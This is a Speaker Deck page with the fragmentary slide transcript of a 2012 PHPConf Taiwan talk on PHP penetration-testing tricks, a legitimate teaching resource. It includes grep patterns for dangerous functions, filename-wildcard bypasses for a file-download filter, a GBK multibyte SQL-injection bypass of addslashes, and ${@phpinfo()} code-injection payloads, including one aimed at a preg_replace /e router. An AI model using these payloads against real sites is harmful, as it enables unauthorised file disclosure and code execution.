Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Security in PHP 那些在滲透測試的小技巧

Orange
August 21, 2024
0
39

Security in PHP 那些在滲透測試的小技巧

PHPConf Taiwan 2012

Orange

August 21, 2024
Tweet

More Decks by Orange

See All by Orange
Best Practices - The Upload
p8361
0
21
網頁安全 Web Security 入門
p8361
0
52
Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞
p8361
13
36k
那些 Web Hacking 中的奇技淫巧
p8361
16
14k
關於 HITCON CTF 的那些事 之 Web 狗如何在險惡的 CTF 世界中存活?
p8361
6
12k
PHPConf 2013 - 矛盾大對決
p8361
53
28k
0-Day 輕鬆談 - Happy Fuzzing Internet Explorer
p8361
15
12k
駭客看 Django
p8361
25
12k

Featured

See All Featured
Why You Should Never Use an ORM
jnunemaker
PRO
54
9.1k
A better future with KSS
kneath
238
17k
Navigating Team Friction
lara
183
15k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
19
2.3k
KATA
mclloyd
29
14k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
160
15k
Automating Front-end Workflow
addyosmani
1366
200k
VelocityConf: Rendering Performance Case Studies
addyosmani
327
24k
Why Our Code Smells
bkeepers
PRO
335
57k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
33
2.7k
Fashionably flexible responsive web design (full day workshop)
malarkey
406
66k
How to Think Like a Performance Engineer
csswizardry
22
1.3k

Transcript

  1. 2012/11/03 @ PHPCONF <[email protected]>

  2. • aka Orange • 2009 • 2011 • 2011 AVTOKYO

    • – – Web Security – Windows Vulnerability Exploitation

  3. • CHROOT Security Group • NISRA • case. • Blog

    – http://blog.orange.tw/
  4. None
  5. None
  6. None

  7. ▪▪

  8. None

  9. <?php $url = $_GET['url']; echo urlencode( $url ); ?>

  10. • Low – Sensitive Information Leakage… • Middle – Insecure

    File Download/Access… • High – Local File Inclusion, Code Injection, SQL Inj…
  11. None

  12. • – – –

  13. • showNews.php?id=198 – showNews.php?id=198/1 • checkName.php?u=lala – checkName.php?u=lala%cc' • getFile.php?path=hsu.doc

    – getFile.php?path=./hsu.doc • main.php?module=index – main.php?module[]=index
  14. None
  15. None

  16. 1. Router, Controller URL Mapping 2. 3. 4. DB ORM

    PHP orz

  17. 1. – system exec shell_exec popen eval create_function call_user_func preg_replace…

    2. – _GET _POST _COOKIE _REQUEST _ENV _FILES _SERVER HTTP_RAW_POST_DATA php://input getenv …

  18. • grep -Re – (include|require).+\$ – (eval|create_function|call_user_func|…).+\$ – (system|exec|shell_exec|passthru|…).+\$ –

    (select|insert|update|where|…).+\$ – (file_get_contents|readfile|fopen|…).+\$ – (unserialize|parse_str|…).+\$ – \$\$, $a\(\) – ……

  19. • grep -Re – \$(_GET|_POST|_COOKIE|_REQUEST|_FILES) – \$(_ENV|_SERVER) – getenv –

    HTTP_RAW_POST_DATA – php://input – …

  20. try { …… $trans->commit(); } catch (xxx_adapter_exception $e) { $trans->rollback();

    require_once 'xxx_exceptio$n.class.php' throw new xxx_exception( …… ); }
  21. None
  22. None

  23. <?php $name = $_GET['name']; $name = basename( $name ); if

    ( eregi( "(.php|.conf)$", $name ) ) exit( "Not Allow PHP." ); else readfile( DOCUMENT_ROOT. $name ); ?>

  24. • down.php?name= – config.php – config"php – config.ph> – config.<

    – c>>>>>"< – c<"< Test on PHP 5.4.8 newest stable version (2012/10/17) Original Will be replaced by < * > ? " .
  25. None

  26. • file_get_contents – > php_stream_open_wrapper_ex – > zend_resolve_path – >

    php_resolve_path_for_zend – > php_resolve_path – > tsrm_realpath – > virtual_file_ex – > tsrm_realpath_r
  27. None

  28. • file_get_contents • file_put_contents • file • readfile • phar_file_get_contents

    • include • include_once • require • require_once • fopen • opendir • readdir • mkdir • ……
  29. None

  30. • config.php/. • config.php///. • c>>>>>.</// Works on PHP 5.2.*

    (2012/10/26)
  31. None

  32. • Web Browser PHP Output (HTML) – Cross-Site Scripting •

    DB Management PHP Output (SQL) – SQL Injection

  33. SELECT * FROM [table] WHERE username = 'PHPCONF'

  34. SELECT * FROM [table] WHERE username = 'PHPCONF\''

  35. SELECT * FROM [table] WHERE username = 'PHPCONF%cc\''

  36. Σ( ° △ °|||)︴ Before After PHPCONF PHPCONF PHPCONF' PHPCONF\'

    PHPCONF%80' PHPCONF�\' PHPCONF%cc' PHPCONF岤' 0x81-0xFE 0x40-0x7E 0xA1-0xFE

  37. • addslashes • mysql_escape_string • magic_quote_gpc • Special Cases –

    pdo – mysql_real_escape_st ring
  38. None

  39. • $url = "http://phpconf.tw/2012/"; • $url = "http://phpconf.tw/$year/"; • $url

    = "http://phpconf.tw/{$year}/"; • $url = "http://phpconf.tw/{${phpinfo()}}/"; • $url = "http://phpconf.tw/${@phpinfo()}/";

  40. config.php $dbuser = "root";

  41. config.php $dbuser = "${@phpinfo()}";

  42. $res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); https://orange.tw/index.php?s=module/action/ param1/${@phpinfo()}

  43. Think PHP

  44. None

  45. – – – – – –

  46. • PHP Security – http://blog.php-security.org/ • Oddities of PHP file

    access in Windows®. – http://onsec.ru/onsec.whitepaper-02.eng.pdf
  47. None